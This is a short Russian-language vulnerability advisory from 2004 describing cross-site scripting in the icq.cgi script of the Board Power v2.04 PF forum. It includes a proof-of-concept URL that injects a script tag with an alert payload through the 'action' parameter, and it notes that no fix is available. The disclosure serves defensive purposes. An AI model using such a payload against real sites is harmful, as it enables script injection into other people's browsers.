Межсайтовый скриптинг в Board Power форуме

Дата публикации:
04.07.2004
Всего просмотров:
1183
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Board Power v2.04 PF

Описание: Уязвимость в скрипте icq.cgi в форуме Board Power v2.04 PF в поле "action" позволяет удаленному пользователю выполнить XSS нападение.

Эксплоит:

http://target/cgi-bin/boardpower/icq.cgi?action=<script>javascript:alert('hello');</script>

URL производителя: http://www.thewebmasterforums.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Уязвимость обнаружил Иван Жданов, dokk21@rambler.ru

или введите имя

CAPTCHA